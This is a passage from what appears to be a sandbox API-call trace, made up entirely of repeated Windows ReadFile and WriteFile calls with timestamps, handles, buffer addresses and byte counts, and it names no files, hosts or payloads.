out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.435] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.436] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.439] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.443] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.444] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.445] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.445] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.446] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1eb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.448] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.450] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.451] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.453] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.454] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.454] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.456] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.456] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.457] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.457] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.458] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.459] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.459] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3ac, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.460] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.461] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.461] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.462] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.463] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.464] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x327, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.465] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.466] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x379, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.466] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.468] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.468] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.469] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.470] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.471] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.471] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.472] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.473] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.474] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.475] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x14d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.476] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.478] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.479] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.480] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.481] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x207, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.482] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.483] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.484] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.486] 